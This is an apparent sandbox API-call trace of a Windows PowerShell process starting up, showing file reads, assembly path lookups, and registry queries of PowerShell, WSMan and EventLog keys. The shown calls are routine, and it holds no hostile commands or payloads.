	[0482.666] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.667] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.667] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.668] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0482.668] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0xe98, lpOverlapped=0x0) returned 1
	[0482.668] ReadFile (in: hFile=0x330, lpBuffer=0x31ed328, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31ed328*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0482.668] ReadFile (in: hFile=0x330, lpBuffer=0x31edd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x31edd28*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0482.668] CloseHandle (hObject=0x330) returned 1
	[0482.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0482.669] SetErrorMode (uMode=0x1) returned 0x1
	[0482.669] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0482.669] SetErrorMode (uMode=0x1) returned 0x1
	[0482.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0482.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0482.669] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0482.669] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0482.669] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0482.669] CoTaskMemFree (pv=0x43be30) 
	[0482.670] RegCloseKey (hKey=0x330) returned 0x0
	[0482.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0482.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0482.670] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xcb01fc, Data2=0xd51c, Data3=0x4b36, Data4=([0]=0x99, [1]=0xdb, [2]=0x75, [3]=0xd, [4]=0x8e, [5]=0xad, [6]=0x2e, [7]=0xd5))) returned 0x0
	[0482.671] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x5a102d17, Data2=0x27ae, Data3=0x4328, Data4=([0]=0xaf, [1]=0x3d, [2]=0xa0, [3]=0xec, [4]=0x43, [5]=0xfd, [6]=0x78, [7]=0x83))) returned 0x0
	[0483.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0483.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0483.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0483.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.325] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.325] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.326] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.326] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.328] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.328] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.329] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.329] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.339] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.340] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.341] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.341] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.341] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0484.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.341] CoTaskMemFree (pv=0x1b39cee0) 
	[0484.347] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d758 | out: phkResult=0x22d758*=0x330) returned 0x0
	[0484.349] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d65c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d658, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d65c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d658*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.349] CoTaskMemFree (pv=0x0) 
	[0484.350] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0484.350] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x3b9bb0, lpcchValueName=0x22d708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.350] CoTaskMemFree (pv=0x3b9bb0) 
	[0484.350] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0484.350] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x3b9bb0, lpcchValueName=0x22d708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.351] CoTaskMemFree (pv=0x3b9bb0) 
	[0484.351] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0484.351] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x3b9bb0, lpcchValueName=0x22d708, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d708, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.351] CoTaskMemFree (pv=0x3b9bb0) 
	[0484.351] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d6ec, lpData=0x0, lpcbData=0x22d6e8*=0x0 | out: lpType=0x22d6ec*=0x1, lpData=0x0, lpcbData=0x22d6e8*=0x8) returned 0x0
	[0484.351] CoTaskMemAlloc (cb=0xc) returned 0x43e510
	[0484.351] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d6bc, lpData=0x43e510, lpcbData=0x22d6b8*=0x8 | out: lpType=0x22d6bc*=0x1, lpData="2.0", lpcbData=0x22d6b8*=0x8) returned 0x0
	[0484.351] CoTaskMemFree (pv=0x43e510) 
	[0485.175] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6a8 | out: phkResult=0x22d6a8*=0x2ec) returned 0x0
	[0485.175] RegQueryInfoKeyW (in: hKey=0x2ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d5ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.175] CoTaskMemFree (pv=0x0) 
	[0485.175] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.175] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x0, lpValueName=0x3b9bb0, lpcchValueName=0x22d658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.175] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.176] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.176] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x1, lpValueName=0x3b9bb0, lpcchValueName=0x22d658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.176] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.176] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.176] RegEnumValueW (in: hKey=0x2ec, dwIndex=0x2, lpValueName=0x3b9bb0, lpcchValueName=0x22d658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.176] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.176] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d63c, lpData=0x0, lpcbData=0x22d638*=0x0 | out: lpType=0x22d63c*=0x1, lpData=0x0, lpcbData=0x22d638*=0x8) returned 0x0
	[0485.176] CoTaskMemAlloc (cb=0xc) returned 0x43e4b0
	[0485.176] RegQueryValueExW (in: hKey=0x2ec, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d60c, lpData=0x43e4b0, lpcbData=0x22d608*=0x8 | out: lpType=0x22d60c*=0x1, lpData="2.0", lpcbData=0x22d608*=0x8) returned 0x0
	[0485.176] CoTaskMemFree (pv=0x43e4b0) 
	[0485.177] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0485.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.178] CoTaskMemFree (pv=0x1b39cee0) 
	[0485.182] CoTaskMemAlloc (cb=0x104) returned 0x1b39cee0
	[0485.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.182] CoTaskMemFree (pv=0x1b39cee0) 
	[0485.188] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6d8 | out: phkResult=0x22d6d8*=0x314) returned 0x0
	[0485.191] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d64c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d648, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d64c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d648*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.192] CoTaskMemFree (pv=0x0) 
	[0485.192] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.192] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.193] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.193] CoTaskMemFree (pv=0x0) 
	[0485.193] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.193] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.193] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.193] CoTaskMemFree (pv=0x0) 
	[0485.193] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.193] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.193] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.193] CoTaskMemFree (pv=0x0) 
	[0485.193] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.193] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.193] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.193] CoTaskMemFree (pv=0x0) 
	[0485.193] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.194] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.194] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.194] CoTaskMemFree (pv=0x0) 
	[0485.194] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0485.194] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.194] CoTaskMemFree (pv=0x3b9bb0) 
	[0485.194] CoTaskMemFree (pv=0x0) 
	[0485.194] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0486.021] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.021] CoTaskMemFree (pv=0x3b9bb0) 
	[0486.021] CoTaskMemFree (pv=0x0) 
	[0486.021] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0486.021] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.021] CoTaskMemFree (pv=0x3b9bb0) 
	[0486.022] CoTaskMemFree (pv=0x0) 
	[0486.022] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0486.022] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x3b9bb0, lpcchName=0x22d6d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d6d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.022] CoTaskMemFree (pv=0x3b9bb0) 
	[0486.022] CoTaskMemFree (pv=0x0) 
	[0486.022] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x1d8) returned 0x0
	[0486.022] RegOpenKeyExW (in: hKey=0x1d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.022] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x338) returned 0x0
	[0486.022] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.022] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x33c) returned 0x0
	[0486.022] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.023] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x340) returned 0x0
	[0486.023] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.023] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x344) returned 0x0
	[0486.023] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.023] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x348) returned 0x0
	[0486.023] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.023] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x34c) returned 0x0
	[0486.023] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.023] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x350) returned 0x0
	[0486.024] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x0) returned 0x2
	[0486.024] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x354) returned 0x0
	[0486.024] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d738 | out: phkResult=0x22d738*=0x358) returned 0x0
	[0486.024] RegCloseKey (hKey=0x358) returned 0x0
	[0486.024] RegCloseKey (hKey=0x314) returned 0x0
	[0486.025] RegCloseKey (hKey=0x354) returned 0x0
	[0486.041] CoTaskMemAlloc (cb=0x804) returned 0x1b3aa5a0
	[0486.041] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3aa5a0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0486.042] CoTaskMemFree (pv=0x1b3aa5a0) 
	[0486.043] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0486.043] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0486.044] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d688 | out: phkResult=0x22d688*=0x340) returned 0x0
	[0487.616] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d5fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.617] CoTaskMemFree (pv=0x0) 
	[0487.617] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.617] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.617] CoTaskMemFree (pv=0x0) 
	[0487.617] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.617] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.617] CoTaskMemFree (pv=0x0) 
	[0487.617] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
